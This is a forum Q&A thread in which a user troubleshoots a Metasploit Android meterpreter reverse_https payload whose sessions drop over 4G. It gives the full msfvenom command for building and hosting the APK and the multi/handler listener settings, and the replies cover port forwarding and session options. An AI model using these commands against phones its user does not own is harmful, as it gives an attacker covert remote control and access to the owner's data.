0

Every time I use a meterpreter reverse https on an android phone over the internet, a session is created but after some seconds it says the session is not valid and it closes. When I do it on the LAN it works fine. So what is the problem? (The phone I'm testing the payload is using 4G connection)

When I create the payload I use:

 msfvenom -p android/meterpreter/reverse_https LPORT=4444 LHOST=<public_ip> -o /var/www/html/payload.apk.

On metasploit I use:

use exploit/multi/handler set payload android/meterpreter/reverse_https set lport 4444 set lhost local ip set luri / set ExitOnSession false set SessionCommunicationTimeout 0 set SessionExpirationTimeout 0 exploit -j

After all this a connection is established but then closed. And sometimes when I create a new handler it creates infinite sessions for the same target, it just keeps creating them until I close the console, can someone help me?

Improve this question
7
  • We assume you set up port forwarding so that the external traffic can reach your handler? Commented Sep 26, 2016 at 17:26
  • Yes, the handler makes a connection, but it closes after some time. Commented Sep 26, 2016 at 17:36
  • I'd run a packet sniffer on your handler to see what's going on. Perhaps your victim is killing the connection prematurely then starting it again? Commented Sep 26, 2016 at 17:39
  • I'm doing it on my own phone, I download the payload to my phone, install it and then execute it and the connection is made and the meterpreter opens without the android module loaded and after some time the session closes Commented Sep 26, 2016 at 17:42
  • I'm confused. The target and your handler are both phones? Are they the same phone? And I assume the problem is when you use the 4G connection, but its fine when it is using wifi? Commented Sep 26, 2016 at 17:49

1 Answer 1

Reset to default
1

Also when testing for configuration issues I would set exitonsession to true.

if you are using your web browser to deliver the payload it can continue to run cycles until fails over.

setting the exitonsession will slow things down for you a bit, and stop creating so many sessions.

Improve this answer

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.